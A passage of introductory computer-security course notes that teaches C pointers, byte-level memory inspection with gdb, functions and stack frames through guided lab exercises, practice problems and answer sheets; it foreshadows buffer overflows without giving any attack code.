Question 5: Complete the printf statement that would allow you to see the address of the character stored at phrase[1] (don't actually make the change using nano, just state what you would do):

    printf( "The address of phrase[1] is %x " , ______________ ) ;

Question 6: Sketch how your array should be stored in memory in the picture shown on your answer sheet. Each box represents a byte in memory. Assume that the array named phrase points to the location shown, and that memory locations are increasing going down the page. For this question all you need to do is fill in the ASCII characters that are stored in each memory location.

If, in answering Question 1 above, you made a modification to your program, restore the program to its original form as shown on the prior page.
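Part 3 of this exercise, Practice Problems 5.5 and 5.6, and Problem 3 all ask you to read memory a byte at a time and put the bytes back together. The program below is an added example written for these notes (not a lab file) that does the same job in code: it prints a buffer byte by byte the way x/xb and x/c do, and reassembles a 4-byte little-endian integer from a stack fragment. The fragment, its values and the names le32_from_bytes, int_at_ebp_minus, machine_is_little_endian and byte_view are all constructed for this example and differ from the practice problems' data.

```c
#include <stdio.h>
#include <string.h>

/* Reassemble a 4-byte little-endian value: the byte at the lowest
 * address is the least significant. This is what you do by hand when
 * you read an int off a stack dump on an x86 machine. */
unsigned int le32_from_bytes(const unsigned char *b)
{
    return (unsigned int)b[0]
         | (unsigned int)b[1] << 8
         | (unsigned int)b[2] << 16
         | (unsigned int)b[3] << 24;
}

/* Constructed stack fragment, laid out like the table in Practice
 * Problem 5.5 but with different contents: one int, then a 2-int array.
 * Addresses increase from left to right / top to bottom. */
static const unsigned char stack_fragment[12] = {
    0x2A, 0x00, 0x00, 0x00,   /* an int holding 42 */
    0x07, 0x00, 0x00, 0x00,   /* arr[0] = 7 */
    0xFF, 0xFF, 0xFF, 0xFF    /* arr[1] = -1 (all bits set) */
};

/* Decode the int stored n_bytes below a pretend ebp (taken here as the
 * end of the fragment), mirroring the ebp-8 style of Practice Problem 5.6. */
int int_at_ebp_minus(size_t n_bytes)
{
    const unsigned char *ebp = stack_fragment + sizeof stack_fragment;
    return (int)le32_from_bytes(ebp - n_bytes);
}

/* Returns 1 if this machine stores the low byte first, as x86 does. */
int machine_is_little_endian(void)
{
    unsigned int probe = 0x01020304;
    unsigned char first;
    memcpy(&first, &probe, 1);          /* the byte at the lowest address */
    return first == 0x04;
}

/* Print memory one byte per line: address, hex value, then the ASCII
 * character (or '.' for non-printable bytes), like x/xb and x/c. */
void byte_view(const void *obj, size_t n)
{
    const unsigned char *p = obj;
    for (size_t i = 0; i < n; i++)
        printf("%p: 0x%02x  %c\n", (const void *)(p + i), p[i],
               (p[i] >= 0x20 && p[i] < 0x7f) ? p[i] : '.');
}

int main(void)
{
    char phrase[10] = "Go Navy!";      /* same shape as the lab's array */
    int value = 2014;

    printf("phrase, byte by byte (note the 0x00 at index 8):\n");
    byte_view(phrase, sizeof phrase);
    printf("int %d, byte by byte (low byte first on x86):\n", value);
    byte_view(&value, sizeof value);

    printf("ebp-12 -> %d, ebp-8 -> %d, ebp-4 -> %d\n",
           int_at_ebp_minus(12), int_at_ebp_minus(8), int_at_ebp_minus(4));
    printf("little-endian machine: %d\n", machine_is_little_endian());
    return 0;
}
```

Compare the byte_view output for value with what x/4xb &value shows in gdb; the order of the bytes is the trap when reading an integer out of a dump by eye.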
Carefully modify your C program (using nano) so that it contains the three new lines marked below:

    #include<stdio.h>
    #include<string.h>
    int main( )
    {
        char phrase[ 10 ] = "Go Navy!" ;
        char *ptr;                      /* add these two lines */
        ptr = phrase;
        printf( "%s\n" , phrase );
        printf( "%s\n" , ptr );         /* add this line */
    }

(You can also add blank lines around the new lines if you wish.)

Compile and execute your program, examining the output. If your program is not compiling STOP and ask your instructor for help. Otherwise, proceed to Part 4.

Part 4: Go Navy Navy

Recall that phrase, the name of an array, is really a pointer to an array of characters. In fact, phrase holds the address of the first element of the array. And the variable ptr is also a pointer.

Question 7: The line of code ptr = phrase; is an assignment statement. What is being assigned to what?

Question 8: Explain your program's output.

Carefully modify your C program so that it contains the three new lines marked below:

    #include<stdio.h>
    #include<string.h>
    int main( )
    {
        char phrase[ 10 ] = "Go Navy!" ;
        char *ptr;
        ptr = phrase;
        char *another_ptr;              /* add this line */
        printf( "%s\n" , phrase );
        printf( "%s\n" , ptr );
        another_ptr = ptr + 3 ;         /* add these two lines */
        printf( "%s\n" , another_ptr );
    }

Compile and execute your program. If your program is not compiling STOP and ask your instructor for help. Otherwise, proceed to Part 5.

Part 5: Army Strikes Back

Question 9: Explain your program's output.

Question 10: In the same sketch as Question 6, fill in:
    the location where ptr points to.
    the location where another_ptr points to.
Carefully modify your C program to add the two new lines marked below (do not worry about the presence or absence of blank lines in your code):

    #include<stdio.h>
    #include<string.h>
    int main( )
    {
        char phrase[ 10 ] = "Go Navy!" ;
        char *ptr;
        ptr = phrase;
        char *another_ptr;
        printf( "%s\n" , phrase );
        printf( "%s\n" , ptr );
        another_ptr = ptr + 3 ;
        printf( "%s\n" , another_ptr );
        strcpy( another_ptr , "Army!" );   /* add these two lines */
        printf( "%s\n" , ptr );
    }

Recall that the strcpy command provides a means for changing the values of the characters stored in a string. Ensure that you use strcpy to change another_ptr, not ptr (see the code above). Note that we then, in the last line of code, use ptr in the printf command.

Compile and execute your program, examining the output.

Question 11: Explain the last line of output produced by the program. Specifically, why did the value of the string named ptr change (as reflected by the last line of output) when all you did using the strcpy command was change a different string (the string named another_ptr)? Phrasing this question another way: Your program above never directly changes ptr after the line ptr = phrase; but, somehow, the value printed out by the last line reflects a change. What caused this?

If you are baffled, STOP and ask your instructor for an explanation. Otherwise, proceed to Part 6.

Part 6: Autopsy of the Program

Recall that when we execute a program, it is moved from secondary memory (e.g., the hard disk) to main memory (RAM). The particular program's machine language code is moved into main memory, and the program is also given additional space in main memory (called the stack) that it can use to store variable values that it needs to execute. In the figure shown below, the machine language code has been moved into main memory starting at address 0x08048374 and the program's stack is between memory locations 0xbfffff71 and 0xbfffff73. Note that our program is not "stored in the CPU."
Rather, the program is stored in main memory. The CPU can interact with the program via the three registers that we have learned about:

    The eip register holds the address of the next instruction that will be executed (but has not yet been executed).
    The esp register points to the "top" of the stack.
    The ebp register points to the bottom of the stack.

Note in the figure above the values of the eip, esp and ebp registers.

Now, the gdb debugger can be thought of as a microscope that allows us to examine in detail the CPU registers and memory. We have seen that we can use the info command to examine registers. For example, in the context of the figure above, if I entered

    i r eip

I should obtain the value of 0x08048374. Similarly, if I entered

    x/xb 0x08048374

I should see the value 0x55. We will examine a program using the debugger, and show in particular how we can use the names of pointer variables in debugger commands. And at the end of this Security Exercise (no peeking!) we will show you a useful enhancement to the examine command.

Enough of program sx5a.c. I'm sure you are sick of that program! Let's move on to sx5b.c!!!

Using nano examine the program sx5b.c. The C program is shown below:

    #include<stdio.h>
    #include<string.h>
    int main( )
    {
        char phrase[ 10 ] = "Go Navy!" ;
        char *ptr;
        ptr = phrase;
        char *another_ptr;
        printf( "%s\n" , phrase );
        printf( "%s\n" , ptr );
        another_ptr = ptr + 3 ;
        printf( "%s\n" , another_ptr );
        strcpy( another_ptr , "Army!" );
        printf( "%s\n" , ptr );
    }

Note that this is the same program that you left off with, but we have cleaned it up (e.g., to remove unnecessary blank lines). DO NOT MAKE ANY CHANGES TO THIS PROGRAM!

Let's use the debugger to examine the program on the prior page a bit more closely. Type the following at the prompt. Do not type the comments!

    gcc -g sx5b.c      // The -g provides extra functionality for the debugger.
    gdb -q ./a.out     // Recall that gdb is the name of the debugger.
    set dis intel      // This displays the assembly code in standard Intel lingo.
    list               // This repeats the source code for convenience.
    <Enter>            // Just hit the Enter key. This displays the remainder of your source code.
    break 13           // This sets a "breakpoint" at line 13. This is the next to last line of your
                       // program, the line that uses strcpy.
    run                // This starts executing the program up to the breakpoint.

After entering all of these commands, your program will have executed up to but not including line 13. Line 13 is the next to last line of your program, the line that uses strcpy.

Let's find out the address that phrase holds (remember, the name of an array such as phrase holds the address of the first element in the array). We would also like to know the actual contents of this address. Let's do this by typing

    x/xb phrase

You should see:

    (gdb) x/xb phrase
    0xbffff800:     0x47

(Note: You may see a number slightly different from 0xbffff800, but you should see the value of 0x47. If you do not see the value of 0x47 then STOP and ask your instructor for help.)

Let's explain the command you just entered. Recall that the first x invokes the examine command, the second x specifies hexadecimal, and the b asks the debugger to display a single-byte quantity. When the examine command is used with array names or pointer variables (such as phrase, ptr and another_ptr), the first item returned will be the contents of the pointer and the second item returned will be the value that the pointer is pointing to.

    (gdb) x/xb phrase
    0xbffff800:     0x47
    ^ the address stored in phrase     ^ the memory contents of this specific address

Question 12. Fill in the picture shown on the answer sheet, showing the contents of phrase, and the hexadecimal value stored in the memory location pointed to by phrase.
(Note that this figure will be gradually filled in as we complete this lab; for this question, you are only being asked to show the contents of phrase, and the value stored in the memory location pointed to by phrase.)

Question 13. What on earth does that 0x47 represent?

Question 14. Determine what is stored at the memory location that phrase contains by examining the memory directly using the command:

    x/xb 0xbffff800

Question 15. On the same figure as Question 12, fill in the contents of ptr and another_ptr. These are both pointers so your answers should be addresses.

Question 16. On the same figure as Question 12, draw arrows showing where phrase, ptr and another_ptr all point to; i.e., draw an arrow from the pointer to the memory location with the corresponding address.

Question 17. On the same figure as Question 12, show the hexadecimal values stored in the memory locations pointed to by these three pointers phrase, ptr and another_ptr.

Question 18. The pointer named another_ptr seems to be pointing to the value 0x4e. What is that?

Question 19. On the same figure as Question 12, fill in the addresses of each byte of main memory depicted on the figure (placing the address to the left of the byte), and fill in the contents of each memory location as ASCII characters. You should do this by using the debugger to examine memory one byte at a time. For example, if I wanted to examine the memory location 0xbffff801 I would enter

    x/xb 0xbffff801

When you have completed your picture, STOP and show it to your instructor. If correct, you can proceed to Part 7.

Part 7: Further Autopsy of the Program

Recall that our program has executed up to but not including line 13. Line 13 is the next to last line of your program, the line that uses strcpy. Now, execute the program (using nexti) until you show line 14 as the next instruction to execute.
In other words, keep entering nexti until you see:

    14        printf( "%s\n" , ptr );

It should be the case that you have to enter nexti four times to see the line shown above.

Question 20. Fill in the picture shown on the answer sheet in its entirety, showing the memory address of all bytes, the contents of all bytes (as ASCII characters) and the contents of the pointers.

Now, the C line of code:

    printf( "%s\n" , ptr );

goes to the memory address pointed to by ptr, and starts printing out characters in memory, one after another, until a NULL is reached.

Question 21. What will be printed out by the next statement (printf( ptr ); )?

Question 22. Your friend is confused. He says: "We never made any changes involving ptr; we only made changes to another_ptr (using the strcpy command)." So, why did we get different results when we executed the line printf( ptr ); ? How do you reply?

We can type out multiple bytes with a single x/xb command by specifying the number of bytes to display. For example, we can print out a single byte starting at the address pointed to by phrase by typing

    x/xb phrase

But, if we want to see, say, 8 bytes of data starting at the address pointed to by phrase, we can type

    x/8xb phrase

Question 23. Explain the meaning of the results that you see when you enter x/8xb phrase.

Question 24. Explain the meaning of the results that you see when you enter x/8c phrase.

Security Exercise 5 Answer Sheet

Name: _____________________

Question 1:

Question 2:

Question 3:

Question 4:

Question 5:

Question 6 and Question 10: [memory sketch]

Question 7:

Question 8:

Question 9:

Question 11:

Question 12, Question 15, Question 16, Question 17, Question 19: [memory figure]

Question 13:

Question 14:

Question 18:

Question 20:

Question 21:

Question 22:

Question 23:

Question 24:

Chapter 6: Functions and the Stack

Objectives:
(a) Demonstrate the ability to analyze simple programs using functions.
(b) Describe the organization and contents of a program's stack throughout the program's execution.
(c) Demonstrate the ability to examine the stack values of a running program.

1. Functions

1.1. Introduction

It is often best to solve a large problem by successively decomposing it into smaller and smaller subproblems until the subproblems are easy enough to directly implement in C. C facilitates this process by providing a mechanism for building up a large program from small subprograms called functions. A large complicated program can be constructed by combining a number of smaller programs (functions), each of which performs specific simple tasks.

To use a function we must invoke it with a function call. The function call specifies:

    the function name
    the arguments—i.e., the inputs—provided to the function

The syntax for a function call is:

    function_name ( argument_1, argument_2, ..., argument_n )

Again, the arguments are the inputs to the function. Functions might (and often do) have only one argument. In fact, some functions have no arguments! If a function has arguments, the arguments can be numbers, variables or more complicated expressions.

The value a function computes is called the return value. The return value can be thought of as the output of a function. Functions can only have at most one return value. Many functions have no return value.

This probably all sounds a bit vague, so let's look at a concrete example. Suppose there was a function named sqrt, used to determine the square root of a number. In the statement

    y = sqrt( x ) ;

the variable x is the function's argument (input) and sqrt( x ) is the function call. The value computed by the function is the function's output, or return value. For example, if x has the value 9.0, then the function's return value is 3.0, and this value is placed into the variable y.

Functions promote the writing of good programs.
If we have to solve a large problem, we successively decompose the large problem into smaller sub-problems until the sub-problems are easy to directly implement as statements in the C programming language. Once we have finished dividing a large problem into individual sub-problems, we write small programs, called functions, to solve each of these individual subtasks.

1.2. User-Defined Functions

C has predefined functions which we can use, but we can also write our own functions. Functions we write ourselves are called user-defined functions. To use our own functions, we must write the code that permits the function to perform its required task.

The Function Definition

The function definition describes how the function accomplishes its task. A function definition is a small program. When we call the function, we run this small program. The syntax is:

    type_returned function_name( type_1 parameter_1 , ... , type_n parameter_n )
    {
        body of the function
    }

where type_returned is the data type of the result returned by the function, type_1 is the data type of parameter_1, and type_n is the data type of parameter_n.

Arguments vs. Parameters

In a function call, the inputs to the function are called the arguments. The values of the arguments are plugged in for the parameters in the function definition before the body of the function is executed. A parameter should be thought of as a placeholder that "stands in" for an argument. The person writing the function may not know the names chosen for the arguments, so he just picks his own parameter names that will serve to stand in for the arguments.

The return Statement

The return statement consists of the keyword return followed by an expression. The value of the expression is what is returned to the statement which called the function. In other words, the value of the expression after the return keyword is the function's output. The function ends when the return statement executes.
An Extended Example

Suppose a person wants to write a function that calculates the absolute value of an integer. Utilizing the if-else statement which you learned in Chapter 3, the absolute value of an integer (given the name number in the program snippet below) can be calculated as:

    if(number >= 0)
    {
        AV = number;
    }
    else
    {
        AV = -1 * number;
    }

If we had a function named AbsVal( x ) which returns the absolute value of a given integer, x, we could write the program as:

    #include <stdio.h>

    int main()
    {
        int x, y;
        printf("Enter an integer: ");
        scanf("%d" , &x );
        y = AbsVal(x);
        printf("The absolute value of the integer is %d\n" , y);
    }

Problem: The program above will not work because there is no built-in function named AbsVal, so we’ll define one. The following program will work:

    #include <stdio.h>

    int AbsVal( int number)
    {
        int AV;
        if(number >=0)
        {
            AV = number;
        }
        else
        {
            AV = -1*number;
        }
        return AV;
    }

    int main()
    {
        int x, y;
        printf("Enter an integer: ");
        scanf("%d" , &x );
        y = AbsVal(x);
        printf("The absolute value of the integer is %d\n" , y);
    }

The program above starts executing at the line of code that has the word main in it. The next line declares the variables x and y, and since they are not initialized, they have random garbage values.

[Figure: the program listing with boxes for main’s variables. The program starts at main; x holds the garbage value -149248 and y holds the garbage value 23972.]

When the user is prompted to enter an integer, let’s say that he enters the value -5. This value is then placed in the variable x.

[Figure: the listing again; x now holds -5 and y still holds its garbage value.]
Now we reach the line with the function call ( y = AbsVal(x); ). The program jumps to the first line of the function named AbsVal.

[Figure: the listing; when we reach the line y = AbsVal(x); we jump to the function! x holds -5, y holds 23972.]

And the value of the argument x is plugged into the parameter number.

[Figure: a copy of the value of x (in this case -5) is placed in the parameter named number; x holds -5, y holds 23972.]

Now the function declares its own variable named AV which initially has a garbage value, but is set equal to 5 in the else statement.

[Figure: number holds -5; AV is changed from the garbage value -944001 to 5; x holds -5, y holds 23972.]

Now, when we reach the return statement ( return AV; ), we jump back to the original function call and the value of AV (which is 5) is placed in the variable y.
[Figure: number holds -5 and AV holds 5 in AbsVal; in main, x holds -5 and y now holds 5.]

1.3. void functions

Functions that produce no values for the rest of the program to use are called void functions. A common example: We want a function to send a message or some output to the screen. The output is sent to the screen, but is not sent back for use in the rest of the program. The syntax for the function definition of a void function is then:

    void function_name(type_1 parameter_1, … , type_n parameter_n)
    {
        body of the function
        return ;
    }

The function call would be simply

    function_name(argument_1, … , argument_n);

So, there are three key differences between the syntax of void functions and the syntax of other functions:

• The keyword void is used instead of a return type.
• The return statement in the function definition does not contain any expression to be returned. In fact, the return statement can be entirely omitted.
• The function call is not used as the right side of an assignment statement.

We can rewrite our earlier example, using a void function, called output, to provide this output value. This is shown below. The function named output will be used to replace the printf statement that displays your absolute value. Note the new function named output. It is called in main with the argument y, whose value is plugged into the parameter Abs_Num.

    #include <stdio.h>

    int AbsVal( int number)
    {
        int AV;
        if(number >=0)
        {
            AV = number;
        }
        else
        {
            AV = -1*number;
        }
        return AV;
    }

    void output( int Abs_Num )
    {
        printf("The absolute value of the integer is %d\n" , Abs_Num);
    }

    int main()
    {
        int x, y;
        printf("Enter an integer: ");
        scanf("%d" , &x );
        y = AbsVal(x);
        output(y);
    }

1.4.
The main function

Would you believe that you have been using functions all along! In fact, main is a function. It is a very special function in that all programs begin executing at the main function.

Practice Problem 6.1

Circle the appropriate words to complete the statements below. Each set of bold terms separated with a slash indicates that you should select one of the choices.

To use a function we must invoke it with a return value / function call / prototype.
The values / parameters / arguments are the inputs to a function.
A value / parameter / argument is a placeholder that “stands in” for a value / parameter / argument.
The result from a function is called the return value / function call / prototype.

Solution:

To use a function we must invoke it with a return value / function call / prototype.
The values / parameters / arguments are the inputs to a function.
A value / parameter / argument is a placeholder that “stands in” for a value / parameter / argument.
The result from a function is called the return value / function call / prototype.

Practice Problem 6.2

What is the primary purpose of a function in a programming language (i.e., why are they used)?

Solution:

Practice Problem 6.3

Explain the error made during the call to the addthendisplay() function below.

    #include<stdio.h>

    void addthendisplay( int first_num, int second_num )
    {
        int sum_of_num = first_num + second_num;
        printf("\nThe sum of the numbers is: %d\n\n", sum_of_num);
    }

    int main()
    {
        int num1 = 27, num2 = 34, num3 = 13;
        addthendisplay( num1 , num2 , num3 );
    }

Solution:

The way that functions are handled by the CPU is the last piece that we need before understanding an important attack called the buffer overflow attack.
Would you believe that the way functions are handled by the CPU can, in the words of an infamous hacker, “produce some of the most insidious data-dependent bugs known to mankind.” Put another way, these functions intended to help us can open the door to allow your computer to be hijacked.

2. The Stack

2.1. A Program in Memory.

Let’s think about what happens when a program is loaded into memory. Recall that the source code that we write is translated into machine language instructions, and these machine language instructions are fetched, decoded, and then executed, one-by-one. So… you would surely agree that the program itself must reside in main memory. When the operating system executes a program, it allocates a block of memory for the machine language code that comprises the program. This section of memory is termed the text segment. When the program is placed in the text segment, additional adjacent memory is given to the program to hold the values that it needs to successfully execute (e.g., values of variables). As we have mentioned, this section is called the stack.

2.2 The Stack during a Function Call.

Let’s look at an example of how the previous program would run in memory. For this first example, we will make some simplifying assumptions:

• We’ll look at source code instead of object code
• We’ll assume everything (an instruction, a stored character, a stored integer, etc.) consumes one address.

So, let’s suppose the program is loaded as shown below.

[Figure: the program loaded in memory, with the text segment (the program starts here, at main) beside the stack.]

All programs begin execution at main. So, when execution begins, the eip register (the instruction pointer) holds the address of the next instruction to be executed: 0x080483c3. This specific instruction is fetched, decoded and executed, and the eip register is then incremented so that it points to the next instruction. (Actually, this incrementing occurs after the fetch, but before the decode and execute.)
As the program executes, this process (fetch, increment eip, decode the fetched instruction, execute) is repeated. Early on in the program we declare variables x and y. Space has to be allotted for these variables. This is where the stack comes in! These variables are stored on the stack.

[Figure: the stack, now holding main’s variables x and y.]

Also, since we are calling a function and passing a value, the argument for the function is stored in memory. Since, in this program, we are passing the value of the variable x, the compiler will copy the value of the variable x and store it in memory. In this program, the name of the copied value is number. So, now our picture looks like this:

[Figure: the stack, holding x, y and the copied argument number.]

Recall that two important registers—ebp and esp—are used to keep track of the location of the stack in memory. The stack pointer register, esp, points to the memory address at the top of the stack. The base register ebp points to the memory location at the bottom (the base) of the stack—literally, the very next address after the bottom variable. So, our picture looks like this:

[Figure: the same stack, with esp pointing at the top and ebp at the address just past the bottom.]

The program continues to run along, line by line, until 0x080483c8 is reached. At this point we are in trouble because we have to jump to an instruction that is not in order. The next instruction is at memory location 0x080483b5. Consider the difficulty the CPU now encounters:

• We go to a different function (Abs_Val) that has its own variables
• We have to know where to jump back to when the function Abs_Val is done.
• We certainly don’t want to lose main’s variables when Abs_Val is done

So, here is what we do. Each function that is called gets its own section of the stack to work with, called its stack frame. So, the stack frame for main, at this point in time, comprises addresses 0xbffff7d7 – 0xbffff7d9. Now, we are going to give Abs_Val a stack frame for it to use for its own variables. After we are done executing the function Abs_Val, we will go back to the main function, and it will go back to using main's own stack frame.
Now, think about this: if we are going to give Abs_Val a stack frame to play with, what information will we need to restore the situation to the way it was before Abs_Val was called? To restore things to the way they were before, we need

• The proper return address for eip
• The prior value of the base pointer ebp

How should we “remember” these values? By placing these two items in the stack frame for the main function:

[Figure: the stack for main, now holding x, y, number, the return address and the prior value of ebp.]

Now, we can safely jump to the function Abs_Val. This function has one variable, so the stack now looks like this:

[Figure: the stack, with Abs_Val’s own stack frame (its variable AV) above main’s frame; ebp and esp now mark Abs_Val’s frame.]

What happens when we reach the return statement in the function Abs_Val? At that point we restore the stack frame for main. But… how do we do that? Easy!

• We know where to reset esp (the stack pointer): In the picture above, we can reset esp to be ebp + 2.
• We know what instruction address should be placed in eip: In the picture above, we place the value stored in address ebp + 1 into eip.
• We know where to reset ebp (the base pointer): In the picture above, we reset ebp to the value pointed to by ebp. In this case, ebp points to the value 0xbffff7da, so we reset ebp to point to address 0xbffff7da.

Practice Problem 6.4

Place the following elements in the order they will appear (from bottom to top) on the stack during a function call from main (while executing the instructions for that function).

• Return Address
• main’s Variables
• Function’s Variables
• Saved value of prior ebp
• Function’s Arguments

Solution:

Practice Problem 6.5

(a) Given the following source code and debugger output, construct the stack frame for the function main in the diagram below part b. Show where the base pointer (label as EBP-Main) and stack pointer (label as ESP-Main) are pointing to, and show where the arguments to exam_function are stored in memory.
    #include<stdio.h>

    void exam_function( int x, int y, int z)
    {
        int some_class;
        int best_class;
        int my_class;
        best_class = x;
        my_class = z;
        some_class = y;
    }

    int main()
    {
        exam_function( 2005, 2003, 2015 );
    }

[Debugger output for part (a): not reproduced in this text.]

(b) Using your answer from part a), and the additional debugger output below, construct the stack frame for the function exam_function. Show the location of the base pointer (label as EBP-Exam) and stack pointer (label as ESP-Exam) on the figure. Note on your figure:

• the location of best_class, some_class, and my_class
• the location of the return address
• the location of the prior value of the base pointer (EBP-Main)

[Additional debugger output for part (b): not reproduced in this text.]

Solution:

    Address     Value     Description
    BFFFF7E8
    BFFFF7EC
    BFFFF7F0
    BFFFF7F4
    BFFFF7F8
    BFFFF7FC
    BFFFF800
    BFFFF804
    BFFFF808
    BFFFF80C
    BFFFF810
    BFFFF814
    BFFFF818
    BFFFF81C
    BFFFF820

Problems

1. Consider the program below which uses a user-defined function named maximum that returns the largest of three numbers. A screen capture of how the program should appear is also shown. Your job: Fill in the three missing blanks!

    #include<stdio.h>

    float maximum(float x, float y, float z)
    {
        float max;
        if( ________ )
        {
            max = x;
        }
        else
        {
            max = y;
        }
        if( z > max )
        {
            ________ ;
        }
        return ________ ;
    }

    int main()
    {
        float number1, number2, number3;
        printf("Enter three numbers and I will tell you the largest: ");
        scanf( "%f %f %f" , &number1 , &number2 , &number3 );
        printf("The largest is %f \n", maximum(number1, number2, number3) );
    }

[Screen capture of the program’s output: not reproduced in this text.]

2. NOTE ABOUT THIS PROBLEM: Although this problem reads sort of like a tutorial (i.e., “type these commands, then answer these questions”) it’s critical to note that the tutorial aspect of this problem is incomplete. That is, you’ll need to type in additional commands at various points, beyond what’s given, in order to be able to answer the questions. Look to Security Exercise 6 for inspiration.
There are different ways to go about getting the answers to this question, but gdb commands such as list, disass main, disass test_function, nexti, and/or x/10xb $esp (where “10” would be replaced by the number of stack frame bytes - starting at the top of the stack - that you wish to view) may come in handy.

Carefully enter the following C program. (Note: there is one blank line after the declaration of buffer, so that the line numbers used below match.)

    void test_function( int a, int b, int c, int d, int e)
    {
        int flag;
        char buffer[ 10 ];

        flag = 1234 ;
        buffer[ 0 ] = 'U' ;
        buffer[ 1 ] = 'S' ;
        buffer[ 2 ] = 'A' ;
    }
    int main( )
    {
        test_function( 5, 6, 7, 8 , 9 ) ;
    }

(a) Compile your program by entering gcc -g followed by the name of your C program (e.g.: if you named your program hwk6.c, you would enter gcc -g hwk6.c ). Then start the debugger by entering:

    gdb -q ./a.out
    set dis intel

Now, we want to run the program up to the call to test_function – that is, the breakpoint should correlate with the line that reads test_function( 5, 6, 7, 8 , 9 ), which should be 13 if the program was entered exactly as shown above. So, enter

    break 13
    run

Sketch a picture of the stack frame for main, showing where the base pointer and stack pointer are pointing to, and show where you believe the arguments to test_function will be stored in memory. Then, enter a second breakpoint:

    break test_function
    continue

and identify where the arguments to the test function are actually stored in memory (i.e., where the values 5, 6, 7, 8 and 9 are stored in memory). Were you correct?

(b) Run the program up to the point of reaching the closing brace of test_function. To do this, enter:

    break 10
    continue

Sketch the contents of the stack frame for test_function as well as the additional memory locations below the base pointer. Use the figure on the next page. Show the location of the base pointer and stack pointer on your figure.
Note on your sketch:

• the location of flag
• the location of buffer
• the location of the return address
• the location of the prior value of the base pointer ebp_main

[Figure for Problem 2(b): blank stack diagram, not reproduced in this text.]

3. Of the four choices below (a, b, c or d), select the most appropriate function definition to replace the commented line in the program.

    #include<stdio.h>

    //YOUR ANSWER HERE//
    {
        float c_sq = a * a + b * b;
        return c_sq;
    }

    int main()
    {
        float answer;
        answer = hypot( 7.12 , 6.37);
        printf("The square of the hypotenuse is: %f\n", answer);
    }

(a) float hypot(float a, float b, float c)
(b) float hypot(int a, int b)
(c) void hypot(float a, float b)
(d) float hypot(float a, float b)

4. Sketch the contents of the stack frame for main under the column labeled Data in hexadecimal. Locate and label the base pointer as ebp_main and the stack pointer as esp_main under Stack Frame Info. Locate and label the variables g, fox[0], fox[1] under What is Represented. (Note: Not every block in the table will be filled in.)

    #include<stdio.h>

    int main()
    {
        char fox[2];
        fox[0] = 'B';
        fox[1] = 0;
        int g = 17;
    }

    Address:      Data:    What is Represented:    Stack Frame Info:
    0xBFFFF810
    0xBFFFF811
    0xBFFFF812
    0xBFFFF813
    0xBFFFF814
    0xBFFFF815
    0xBFFFF816
    0xBFFFF817
    0xBFFFF818

Security Exercise 6

Part 1. Initial Setup

Today you will use the program sx6.c which has been written for you and placed in the ec310code directory. Copy this file to the work directory by carefully entering the following at the home directory prompt:

    midshipman@EC310:~ $ cp ec310code/sx6.c work

Make sure you are at your home directory!

Sidebar: If you fear making anyone mad, then you ultimately probe for the lowest common denominator of human achievement. And, by the way, who am I?

Verify that you have sx6.c in your work directory by changing to the work directory:

    cd work

and then listing the files in the work directory:

    ls

If you do not have sx6.c in your work directory STOP and ask your instructor or lab tech for help. Otherwise, proceed to Part 2.

Part 2.
Our Program for Today

Look at the program sx6.c using nano. The program sx6.c is shown below:

    void test_function( int a, int b, int c, int d)
    {
        int flag;
        char buffer[ 10 ];

        flag = 31337;
        buffer[ 0 ] = 'A' ;
    }
    int main( )
    {
        test_function( 1, 2, 3, 4 ) ;
    }

Note that to make this first exploration of the stack as simple as possible, we did NOT include the line #include<stdio.h> in our program.12 This is okay, since we do not use any input (scanf) or output (printf) statements. Note that this program produces no output. It truly is a useless program… but it’s simple enough to explore the stack for the first time.

Question 1: How many functions are in the program?

12 This program is a very slightly modified version of the program named stack_example.c from page 71 of the Erickson text. We have modified the layout of the braces to the form we are familiar with.

Save your program ( Control-o ) and exit nano ( Control-x) and then compile your program using

    gcc -g sx6.c

and then run your program

    ./a.out

to confirm it executes without errors. (The program does not produce any output—you are just making sure you do not get any error messages.) If your program is not working STOP and ask your instructor for help. Otherwise, proceed to Part 3.

Part 3. The Two Functions in Memory

Question 2: Note that the function named test_function is passed four arguments: 1, 2, 3 and 4. How much memory (in bytes) does each of these four arguments need?

Question 3: How much memory (in bytes) is needed to store test_function‘s flag variable?

Question 4: How much memory (in bytes) is needed to store test_function‘s array named buffer?

Let’s examine how the main function is stored in memory. Enter:

    gdb -q ./a.out
    set dis intel
    disass main

You should see this:

[gdb output: the disassembly of main, not reproduced in this text.]

Recall that the assembly language code above corresponds to the main function, repeated below:

    int main( )
    {
        test_function( 1, 2, 3, 4 ) ;
    }

Question 5: Where in main memory is the first instruction that starts the main function?
Now let’s examine how the function named test_function is stored in memory. Enter:

    disass test_function

You should see this:

[gdb output: the disassembly of test_function, not reproduced in this text.]

Question 6: Where in main memory is the first instruction that starts the function named test_function?

So…what’s really going on? To answer this, we will look at the stack frame for each of our two functions. Onward to Part 4!

Part 4. The Stack Frame for main

Let’s set a breakpoint in main right before the call to test_function. Enter the following commands:

    list main
    break 11
    run

In the listing, the call to test_function is line 11. So, the command break 11 will run our program to the point of this line (but not including this line!). That means that our program will pause right before the call to the function named test_function. You should see:

[gdb output: the program stopped at the breakpoint, not reproduced in this text.]

Question 7: What address is stored in the instruction pointer (i.e., the eip register)? Go back to the assembly code for main (shown on the preceding page).

Question 8. Based on your answer to question 7, what is the assembly language instruction that the instruction pointer is pointing to? Is this still in the main function?

So, let's start looking at the stack! Recall that the stack is the area in main memory that the program has available to store any values that it needs for successful execution (such as variables, arguments, important addresses, etc.). The active part of the stack is bounded by the two registers esp and ebp.

Question 9: What are the addresses stored in the stack pointer (esp) and the base pointer (ebp)?

Question 10. Considering the values of esp and ebp, how many bytes are in this stack frame? (Hint: you must remember that these values are in hexadecimal! Recall that esp points to the first address in the stack frame and ebp points to the first address after the stack frame. Thus, subtracting the address pointed to by esp from the address pointed to by ebp provides the number of bytes in the stack frame.)
Question 11: In the picture of memory shown on your answer sheet, note that the base pointer points to the bottom of the stack. Fill in the addresses next to each byte (for ease, you may, if you wish, label only the last four hexadecimal digits of each address). Indicate on the diagram where the stack pointer is pointing to.

Now, looking at where the instruction pointer is pointing to, the next four instructions that should be executed are (but don’t actually execute these just yet):

    mov DWORD PTR [esp+12],0x4
    mov DWORD PTR [esp+8],0x3
    mov DWORD PTR [esp+4],0x2
    mov DWORD PTR [esp],0x1

In English, the first of these instructions says: Place the value 4 in the memory location given by esp + 12 (i.e., the stack pointer + 12). Note that the 12 in this case is given in base-10. Similarly, the second of these instructions says: Place the value 3 in the memory location given by esp + 8 (i.e., the stack pointer + 8). Note that the 8 in this case is given in base-10.

